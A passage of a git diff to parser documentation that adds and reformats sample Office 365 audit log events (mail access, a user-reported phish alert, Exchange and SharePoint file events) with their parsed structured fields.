demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "clientipadress.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-06-26T06:29:14\", \"Id\": \"xxxx-xxx-xxx-xxxx\", \"Operation\": \"MailItemsAccessed\", \"OrganizationId\": \"xxxx-xxx-xxx-xxxx\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"xxxx-xxx-xxx-xxxx\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\", \"UserId\": \"user@mail.fr\", \"AppId\": \"xxxx-xxx-xxx-xxxx\", \"ClientAppId\": \"clientappidxxxx-xxx-xxx-xxxx\", \"ClientIPAddress\": \"1000:1000:100:007::1\", \"ClientInfoString\": \"Client=Exemple1;Client=Exemple2;;\", \"ExternalAccess\": \"False\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-xxxx-xxx-xxx-xxxx\", \"MailboxGuid\": \"xxxx-xxx-xxx-xxxx\", \"MailboxOwnerSid\": \"S-1-5-21-xxxx-xxx-xxx-xxxx\", \"MailboxOwnerUPN\": \"user@mail.fr\", \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationName\": \"organization.microsoft.com\", \"OriginatingServer\": \"server (0.0.0000.000)\\r\\n\", \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"xxxx-xxx-xxx-xxxx\", \"Id\": \"aaaaaaaaaaaaa\", \"InternetMessageId\": \"xxxxx@exemple.com\", \"SizeInBytes\": 127625}, {\"ClientRequestId\": \"xxxx-xxx-xxx-xxxx\", \"Id\": \"aaaaaaaaaaaaaaaaaa\", \"InternetMessageId\": \"xxxx-xxx-xxx-xxxx@enterprise.net\", \"SizeInBytes\": 147360}], \"Id\": \"aaaaaaaaaaaaaaaaaaaa\", \"Path\": \"Boite de reception\"}], \"OperationCount\": 2}", + "event": { + "action": "MailItemsAccessed", + "code": "50", + "outcome": "success" + }, + "@timestamp": "2024-06-26T06:29:14Z", + "action": { + "id": 50, + "name": "MailItemsAccessed", + "outcome": "success", + "target": "user" + }, + "office365": { + "record_type": 50, + "result_status": "Succeeded", + "user_type": { + "code": 5, + "name": "Application" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1000:1000:100:7::1" + ], + "user": [ + "user@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1000:1000:100:7::1", + "ip": "1000:1000:100:7::1" + }, + "user": { + "email": "user@mail.fr", + "id": "xxxx-xxx-xxx-xxxx", + "name": "user@mail.fr" + } + } + + ``` + + === "compliancemanager-scorechange.json" ```json { - "message": "{\"ActionId\":\"a81edede-be03-41f4-aae2-b6b25186adc6\",\"ActionName\":\"Enable self-service password reset\",\"ActionProducts\":[],\"ActionScore\":26.0,\"ActionScoreChange\":-1.0,\"ActionActivity\":\"COMPLIANCEMANAGER-SCORECHANGE\",\"Assessments\":[],\"Templates\":[],\"Solutions\":[],\"ManagedBy\":\"User\",\"ActionScope\":\"Tenant\",\"UserId\":\"\",\"Id\":\"aa9367e4-9fa3-4709-8326-b35c04f784d2\",\"RecordType\":155,\"CreationTime\":\"2022-10-05T10:12:57\",\"Operation\":\"COMPLIANCEMANAGER-SCORECHANGE\",\"OrganizationId\":\"163381f4-6b9c-43c2-8b57-bfc16b7354f2\",\"UserType\":2,\"UserKey\":\"Organization\",\"Workload\":\"ComplianceManager\",\"ResultStatus\":\"Successful\",\"Version\":1}", + "message": "{\"ActionId\": \"a81edede-be03-41f4-aae2-b6b25186adc6\", \"ActionName\": \"Enable self-service password reset\", \"ActionProducts\": [], \"ActionScore\": 26.0, \"ActionScoreChange\": -1.0, \"ActionActivity\": \"COMPLIANCEMANAGER-SCORECHANGE\", \"Assessments\": [], \"Templates\": [], \"Solutions\": [], \"ManagedBy\": \"User\", \"ActionScope\": \"Tenant\", \"UserId\": \"\", \"Id\": \"aa9367e4-9fa3-4709-8326-b35c04f784d2\", \"RecordType\": 155, \"CreationTime\": \"2022-10-05T10:12:57\", \"Operation\": \"COMPLIANCEMANAGER-SCORECHANGE\", \"OrganizationId\": \"163381f4-6b9c-43c2-8b57-bfc16b7354f2\", \"UserType\": 2, \"UserKey\": \"Organization\", \"Workload\": \"ComplianceManager\", \"ResultStatus\": \"Successful\", \"Version\": 1}", "event": { "action": "COMPLIANCEMANAGER-SCORECHANGE", "code": "155", @@ -627,12 +764,81 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_reported.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-05-24T06:29:22\", \"Id\": \"03604c8d-ed69-466b-a9f4-80467c958739\", \"Operation\": \"AlertUpdated\", \"OrganizationId\": \"4f962933-707f-4441-8d56-bb178a2ed0b9\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"f54a9b97-a432-471b-a84a-ddcba13f5f35\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertId\": \"2c7f6c46-33d7-4101-b2fc-0af27eaf308a\", \"AlertLinks\": [], \"AlertType\": \"System\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"{\\\"f3u\\\":\\\"john.doe@example.com\\\",\\\"ts\\\":\\\"2024-05-24T05:44:00Z\\\",\\\"te\\\":\\\"2024-05-24T05:45:00Z\\\",\\\"op\\\":\\\"UserSubmission\\\",\\\"wl\\\":\\\"SecurityComplianceCenter\\\",\\\"tid\\\":\\\"8a1a1157-0272-492d-ab10-3f9853ac8183\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"a04c1571-7271-445e-82e3-c39f848aceb8\\\",\\\"wsrt\\\":\\\"2024-05-24T05:45:22\\\",\\\"mdt\\\":\\\"Audit\\\",\\\"rid\\\":\\\"9a36861c-cc4d-4818-be4a-a20555480a00\\\",\\\"cid\\\":\\\"2b6fda52-8386-4213-b6fb-2fcb078571c4\\\",\\\"ad\\\":\\\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.3\\\",\\\"lon\\\":\\\"UserSubmission\\\",\\\"an\\\":\\\"Email reported by user as malware or phish\\\",\\\"sev\\\":\\\"Low\\\",\\\"ail\\\":\\\"https://security.microsoft.com/mtp-investigation/urn:SubmissionInvestigation:260a29b9cf8a4358857b82aa9f086c48\\\"}\", \"Name\": \"Email reported by user as malware or phish\", \"PolicyId\": \"5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52\", \"Severity\": \"Low\", \"Source\": \"Office 365 Security & Compliance\", \"Status\": \"Resolved\"}", + "event": { + "action": "AlertUpdated", + "category": [ + "intrusion_detection" + ], + "code": "40", + "kind": "alert", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-05-24T06:29:22Z", + "action": { + "id": 40, + "name": "AlertUpdated", + "outcome": "success", + "target": "user" + }, + "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "Email reported by user as malware or phish", + "id": "2c7f6c46-33d7-4101-b2fc-0af27eaf308a", + "severity": "Low", + "source": "Office 365 Security & Compliance", + "status": "Resolved" + }, + "audit": { + "object_id": "f54a9b97-a432-471b-a84a-ddcba13f5f35" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "4f962933-707f-4441-8d56-bb178a2ed0b9" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52" + }, + "service": { + "name": "SecurityComplianceCenter" + }, + "user": { + "domain": "example.com", + "email": "john.doe@example.com", + "id": "SecurityComplianceAlerts", + "name": "john.doe" + } + } + + ``` + + === "exchange_event1.json" ```json { - "message": "{\"CreationTime\":\"2022-04-05T20:35:01\",\"Id\":\"5615b32d-4c18-4ada-cc88-08da1743c258\",\"Operation\":\"Create\",\"OrganizationId\":\"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"10033FFF80D15ECF\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"d498:796:298e:be16:1b11:29eb:9996:8a36\",\"UserId\":\"email@example.org\",\"AppId\":\"27922004-5251-4030-b22d-91ecd9a37ea4\",\"ClientIPAddress\":\"d498:796:298e:be16:1b11:29eb:9996:8a36\",\"ClientInfoString\":\"Client=OutlookService;Outlook-iOS/2.0;\",\"ClientRequestId\":\"1725\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-3620271904-3241272990-2175486473-1085344\",\"MailboxGuid\":\"24683bc8-fab1-48b3-b834-cb11b95bb911\",\"MailboxOwnerSid\":\"S-1-5-21-3620271904-3241272990-2175486473-1085344\",\"MailboxOwnerUPN\":\"email@example.org\",\"OrganizationName\":\"xxxx.onmicrosoft.com\",\"OriginatingServer\":\"PR3PR03MB6601 (15.20.4200.000)\\r\\n\",\"SessionId\":\"8ad3822b-1cfd-40e7-aeaa-6d0708691ad8\",\"Item\":{\"Id\":\"LgAAAAAdhAMRqmYRzZvIAKoAL8RaDQCB1ldAzYsRRItL+noffZbOAATJxTeHAAAJ\",\"InternetMessageId\":\"\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAAAbOnSFmOkITaMliEZRj+Z3AQAPzmaC0nx3Qo/JWqclreA/AAAEUskDAAAB\",\"Path\":\"\\\\Drafts1\"},\"SizeInBytes\":34785,\"Subject\":\"Email subject\"}}", + "message": "{\"CreationTime\": \"2022-04-05T20:35:01\", \"Id\": \"5615b32d-4c18-4ada-cc88-08da1743c258\", \"Operation\": \"Create\", \"OrganizationId\": \"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\", \"RecordType\": 2, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"10033FFF80D15ECF\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"Exchange\", \"ClientIP\": \"d498:796:298e:be16:1b11:29eb:9996:8a36\", \"UserId\": \"email@example.org\", \"AppId\": \"27922004-5251-4030-b22d-91ecd9a37ea4\", \"ClientIPAddress\": \"d498:796:298e:be16:1b11:29eb:9996:8a36\", \"ClientInfoString\": \"Client=OutlookService;Outlook-iOS/2.0;\", \"ClientRequestId\": \"1725\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-3620271904-3241272990-2175486473-1085344\", \"MailboxGuid\": \"24683bc8-fab1-48b3-b834-cb11b95bb911\", \"MailboxOwnerSid\": \"S-1-5-21-3620271904-3241272990-2175486473-1085344\", \"MailboxOwnerUPN\": \"email@example.org\", \"OrganizationName\": \"xxxx.onmicrosoft.com\", \"OriginatingServer\": \"PR3PR03MB6601 (15.20.4200.000)\\r\\n\", \"SessionId\": \"8ad3822b-1cfd-40e7-aeaa-6d0708691ad8\", \"Item\": {\"Id\": \"LgAAAAAdhAMRqmYRzZvIAKoAL8RaDQCB1ldAzYsRRItL+noffZbOAATJxTeHAAAJ\", \"InternetMessageId\": \"\", \"IsRecord\": false, \"ParentFolder\": {\"Id\": \"LgAAAAAbOnSFmOkITaMliEZRj+Z3AQAPzmaC0nx3Qo/JWqclreA/AAAEUskDAAAB\", \"Path\": \"\\\\Drafts1\"}, \"SizeInBytes\": 34785, \"Subject\": \"Email subject\"}}", "event": { "action": "Create", "category": [ @@ -704,7 +910,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-09-15T18:16:53\",\"Id\":\"461a38ce-fc36-4a4d-b73e-643262cc063f\",\"Operation\":\"MailItemsAccessed\",\"OrganizationId\":\"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\",\"RecordType\":50,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"100320029D9C5179\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"UserId\":\"NestorW@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientIPAddress\":\"2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7\",\"ClientInfoString\":\"Client=OWA;Action=ViaProxy\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxGuid\":\"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\",\"MailboxOwnerSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxOwnerUPN\":\"NestorW@example.onmicrosoft.com\",\"OperationProperties\":[{\"Name\":\"MailAccessType\",\"Value\":\"Bind\"},{\"Name\":\"IsThrottled\",\"Value\":\"False\"}],\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 (15.20.4200.000)\\r\\n\",\"SessionId\":\"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\",\"Folders\":[{\"FolderItems\":[{\"InternetMessageId\":\"\",\"Sensitivity\":\"defa4170-0d19-0005-0004-bc88714345d2\",\"SizeInBytes\":3476},{\"InternetMessageId\":\"\",\"SizeInBytes\":4871},{\"InternetMessageId\":\"\",\"SizeInBytes\":4873}],\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEPAAAB\",\"Path\":\"\\\\Brouillons\"}],\"OperationCount\":3}\r", + "message": "{\"CreationTime\": \"2023-09-15T18:16:53\", \"Id\": \"461a38ce-fc36-4a4d-b73e-643262cc063f\", \"Operation\": \"MailItemsAccessed\", \"OrganizationId\": \"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"100320029D9C5179\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"Exchange\", \"UserId\": \"NestorW@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientIPAddress\": \"2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7\", \"ClientInfoString\": \"Client=OWA;Action=ViaProxy\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxGuid\": \"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\", \"MailboxOwnerSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxOwnerUPN\": \"NestorW@example.onmicrosoft.com\", \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.4200.000)\\r\\n\", \"SessionId\": \"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\", \"Folders\": [{\"FolderItems\": [{\"InternetMessageId\": \"\", \"Sensitivity\": \"defa4170-0d19-0005-0004-bc88714345d2\", \"SizeInBytes\": 3476}, {\"InternetMessageId\": \"\", \"SizeInBytes\": 4871}, {\"InternetMessageId\": \"\", \"SizeInBytes\": 4873}], \"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEPAAAB\", \"Path\": \"\\\\Brouillons\"}], \"OperationCount\": 3}", "event": { "action": "MailItemsAccessed", "code": "50", @@ -732,6 +938,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "id": "80494e66-e53a-48eb-8e52-c6ba3b1ddd2c" }, "related": { + "ip": [ + "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7" + ], "user": [ "NestorW@example.onmicrosoft.com" ] @@ -739,6 +948,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "service": { "name": "Exchange" }, + "source": { + "address": "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7", + "ip": "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7" + }, "user": { "email": "NestorW@example.onmicrosoft.com", "id": "100320029D9C5179", @@ -754,7 +967,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-09-15T18:11:42\",\"Id\":\"d0d7820c-cdbe-4524-bf75-08dbb61736bf\",\"Operation\":\"HardDelete\",\"OrganizationId\":\"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\",\"RecordType\":3,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"100320029D9C5179\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"12.34.56.78\",\"UserId\":\"NestorW@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientIPAddress\":\"12.34.56.78\",\"ClientInfoString\":\"Client=OWA;Action=ViaProxy\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxGuid\":\"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\",\"MailboxOwnerSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxOwnerUPN\":\"NestorW@example.onmicrosoft.com\",\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 (15.20.4200.000)\\r\\n\",\"SessionId\":\"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\",\"AffectedItems\":[{\"Id\":\"RgAAAABxSjbeIoBUT6MlFIM9cqcFBwCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAACxmw0Q8U/kQIyFE2Uk+mwoAABVzgKRAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\",\"Path\":\"\\\\Recoverable Items\\\\Deletions\"},\"Subject\":\"\"}],\"CrossMailboxOperation\":false,\"Folder\":{\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\",\"Path\":\"\\\\Recoverable Items\\\\Deletions\"}}\r\n\r", + "message": "{\"CreationTime\": \"2023-09-15T18:11:42\", \"Id\": \"d0d7820c-cdbe-4524-bf75-08dbb61736bf\", \"Operation\": \"HardDelete\", \"OrganizationId\": \"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\", \"RecordType\": 3, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"100320029D9C5179\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"Exchange\", \"ClientIP\": \"12.34.56.78\", \"UserId\": \"NestorW@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientIPAddress\": \"12.34.56.78\", \"ClientInfoString\": \"Client=OWA;Action=ViaProxy\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxGuid\": \"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\", \"MailboxOwnerSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxOwnerUPN\": \"NestorW@example.onmicrosoft.com\", \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.4200.000)\\r\\n\", \"SessionId\": \"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\", \"AffectedItems\": [{\"Id\": \"RgAAAABxSjbeIoBUT6MlFIM9cqcFBwCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAACxmw0Q8U/kQIyFE2Uk+mwoAABVzgKRAAAJ\", \"InternetMessageId\": \"\", \"ParentFolder\": {\"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\", \"Path\": \"\\\\Recoverable Items\\\\Deletions\"}, \"Subject\": \"\"}], \"CrossMailboxOperation\": false, \"Folder\": {\"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\", \"Path\": \"\\\\Recoverable Items\\\\Deletions\"}}", "event": { "action": "HardDelete", "category": [ @@ -983,60 +1196,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "office365": { "exchange": { - "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507", - "modified_properties": [ - "AllAttachmentsHidden", - "AppointmentRecurring", - "AttendeeCriticalChangeTime", - "BirthdayContactAttributionDisplayName", - "BirthdayLocal", - "CreationTime", - "DisplayName", - "HtmlBody", - "ItemClass", - "Location", - "MapiEndTime", - "MapiIsAllDayEvent", - "MapiPREndDate", - "MapiPRStartDate", - "MapiStartTime", - "MapiSubject", - "NormalizedSubjectInternal", - "PartnerNetworkId", - "PartnerNetworkUserId", - "ReceivedByAddrType", - "ReceivedByEmailAddress", - "ReceivedByEntryId", - "ReceivedByName", - "ReceivedBySmtpAddress", - "ReceivedTime", - "RecipientCollection", - "ReplyForwardStatus", - "RtfBody", - "SendRichInfo", - "SenderAddressType", - "SenderDisplayName", - "SenderEmailAddress", - "SenderEntryId", - "SenderSID", - "SenderSmtpAddress", - "SentRepresentingDisplayName", - "SentRepresentingEmailAddress", - "SentRepresentingEntryId", - "SentRepresentingSID", - "SentRepresentingSmtpAddress", - "SentRepresentingType", - "SentTime", - "SipUri", - "SubjectPrefixInternal", - "TextBody", - "TimeZone", - "TimeZoneBlob", - "TimeZoneDefinitionEnd", - "TimeZoneDefinitionRecurring", - "TimeZoneDefinitionStart", - "When" - ] + "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, "record_type": 2, "result_status": "Succeeded", @@ -1174,7 +1334,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxx-xxx-xxx-xxx\",\"ClientAppName\":\"WebExcel\",\"CorrelationId\":\"xxx-xxx-xxx-xxx\"},\"CreationTime\":\"2024-02-22T16:06:53\",\"Id\":\"xxx-xxx-xxx-xxx\",\"Operation\":\"FileModifiedExtended\",\"OrganizationId\":\"xxx-xxx-xxx-xxx\",\"RecordType\":6,\"UserKey\":\"adresse@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@mail.com\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"\",\"BrowserVersion\":\"\",\"CorrelationId\":\"xxx-xxx-xxx-xxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"File\",\"ListId\":\"xxx-xxx-xxx-xxx\",\"ListItemUniqueId\":\"xxx-xxx-xxx-xxx\",\"Platform\":\"OfficeCollaborationService\",\"Site\":\"xx-xxx-xx-xx\",\"UserAgent\":\"Useragentname\",\"WebId\":\"xxx-xx-xxx-xxx\",\"DeviceDisplayName\":\"0.0.0.0\",\"FileSizeBytes\":906087,\"HighPriorityMediaProcessing\":false,\"ListBaseType\":1,\"ListServerTemplate\":101,\"SourceFileExtension\":\"xlsx\",\"SiteUrl\":\"https://sharepoint.com/sites/filepath/\",\"SourceRelativeUrl\":\"Folder/Path\",\"SourceFileName\":\"FILENAME.xlsx\",\"ApplicationDisplayName\":\"WebExcel\",\"ObjectId\":\"https://site.file.name.xlsx\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxx-xxx-xxx-xxx\", \"ClientAppName\": \"WebExcel\", \"CorrelationId\": \"xxx-xxx-xxx-xxx\"}, \"CreationTime\": \"2024-02-22T16:06:53\", \"Id\": \"xxx-xxx-xxx-xxx\", \"Operation\": \"FileModifiedExtended\", \"OrganizationId\": \"xxx-xxx-xxx-xxx\", \"RecordType\": 6, \"UserKey\": \"adresse@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@mail.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"xxx-xxx-xxx-xxx\", \"EventSource\": \"SharePoint\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"xxx-xxx-xxx-xxx\", \"ListItemUniqueId\": \"xxx-xxx-xxx-xxx\", \"Platform\": \"OfficeCollaborationService\", \"Site\": \"xx-xxx-xx-xx\", \"UserAgent\": \"Useragentname\", \"WebId\": \"xxx-xx-xxx-xxx\", \"DeviceDisplayName\": \"0.0.0.0\", \"FileSizeBytes\": 906087, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 101, \"SourceFileExtension\": \"xlsx\", \"SiteUrl\": \"https://sharepoint.com/sites/filepath/\", \"SourceRelativeUrl\": \"Folder/Path\", \"SourceFileName\": \"FILENAME.xlsx\", \"ApplicationDisplayName\": \"WebExcel\", \"ObjectId\": \"https://site.file.name.xlsx\"}", "event": { "action": "FileModifiedExtended", "category": [ @@ -1277,7 +1437,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"0e042318-7c78-4acb-ae00-5ee74465bca3\",\"CorrelationId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"UniqueTokenId\":\"0000000000000000000000\"},\"CreationTime\":\"2022-06-10T12:00:14\",\"Id\":\"7c13b5d5-aa8d-48d1-b3d1-5f4b657136ba\",\"Operation\":\"FileSyncDownloadedFull\",\"OrganizationId\":\"2d7585dc-97bc-4494-b98c-79f2a4946931\",\"RecordType\":6,\"UserKey\":\"i:0h.f|membership|0000000000000000@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"1.2.3.4\",\"ObjectId\":\"https://company.sharepoint.com/sites/shared/public/assets/website/logo.png\",\"UserId\":\"marketing@company.com\",\"CorrelationId\":\"4b25e3d9-1e4f-4c62-a544-da747449f144\",\"EventSource\":\"SharePoint\",\"ItemType\":\"File\",\"ListId\":\"ca07dda5-0cdc-4399-94a6-303a7aa8ac00\",\"ListItemUniqueId\":\"ab5a159c-c8fd-409c-a48f-524c29df0341\",\"Site\":\"1a53ae0f-8405-42ec-8c43-724101fd34a2\",\"UserAgent\":\"Microsoft SkyDriveSync 22.099.0508.0001 ship; Windows NT 10.0 (19043)\",\"WebId\":\"ba71b4fe-22e8-41cf-9eaf-48b1787bad16\",\"MachineDomainInfo\":\"f059d209-e819-402b-a391-4941ff3860c6\",\"MachineId\":\"884ecccb-1e44-4dd4-a2b5-b60517893ce0\",\"FileSyncBytesCommitted\":\"1344200\",\"HighPriorityMediaProcessing\":false,\"SourceFileExtension\":\"png\",\"SiteUrl\":\"https://company.sharepoint.com/sites/shared\",\"SourceFileName\":\"logo.png\",\"SourceRelativeUrl\":\"public/assets/website\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"0e042318-7c78-4acb-ae00-5ee74465bca3\", \"CorrelationId\": \"c299a0a0-14da-428a-b08d-481d562298cb\", \"UniqueTokenId\": \"0000000000000000000000\"}, \"CreationTime\": \"2022-06-10T12:00:14\", \"Id\": \"7c13b5d5-aa8d-48d1-b3d1-5f4b657136ba\", \"Operation\": \"FileSyncDownloadedFull\", \"OrganizationId\": \"2d7585dc-97bc-4494-b98c-79f2a4946931\", \"RecordType\": 6, \"UserKey\": \"i:0h.f|membership|0000000000000000@live.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"1.2.3.4\", \"ObjectId\": \"https://company.sharepoint.com/sites/shared/public/assets/website/logo.png\", \"UserId\": \"marketing@company.com\", \"CorrelationId\": \"4b25e3d9-1e4f-4c62-a544-da747449f144\", \"EventSource\": \"SharePoint\", \"ItemType\": \"File\", \"ListId\": \"ca07dda5-0cdc-4399-94a6-303a7aa8ac00\", \"ListItemUniqueId\": \"ab5a159c-c8fd-409c-a48f-524c29df0341\", \"Site\": \"1a53ae0f-8405-42ec-8c43-724101fd34a2\", \"UserAgent\": \"Microsoft SkyDriveSync 22.099.0508.0001 ship; Windows NT 10.0 (19043)\", \"WebId\": \"ba71b4fe-22e8-41cf-9eaf-48b1787bad16\", \"MachineDomainInfo\": \"f059d209-e819-402b-a391-4941ff3860c6\", \"MachineId\": \"884ecccb-1e44-4dd4-a2b5-b60517893ce0\", \"FileSyncBytesCommitted\": \"1344200\", \"HighPriorityMediaProcessing\": false, \"SourceFileExtension\": \"png\", \"SiteUrl\": \"https://company.sharepoint.com/sites/shared\", \"SourceFileName\": \"logo.png\", \"SourceRelativeUrl\": \"public/assets/website\"}", "event": { "action": "FileSyncDownloadedFull", "category": [ @@ -1381,7 +1541,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"Id\":\"40094389-7baf-a3ba-5acc-2773c002cfbe\",\"RecordType\":22,\"CreationTime\":\"2022-09-07T12:22:07\",\"Operation\":\"FileVisited\",\"OrganizationId\":\"12b674a1-3497-4997-b4ab-2a40bf0e5139\",\"UserType\":0,\"UserKey\":\"10032001cf3045ad\",\"Workload\":\"Yammer\",\"ResultStatus\":\"TRUE\",\"ObjectId\":\"Pix_C'est la 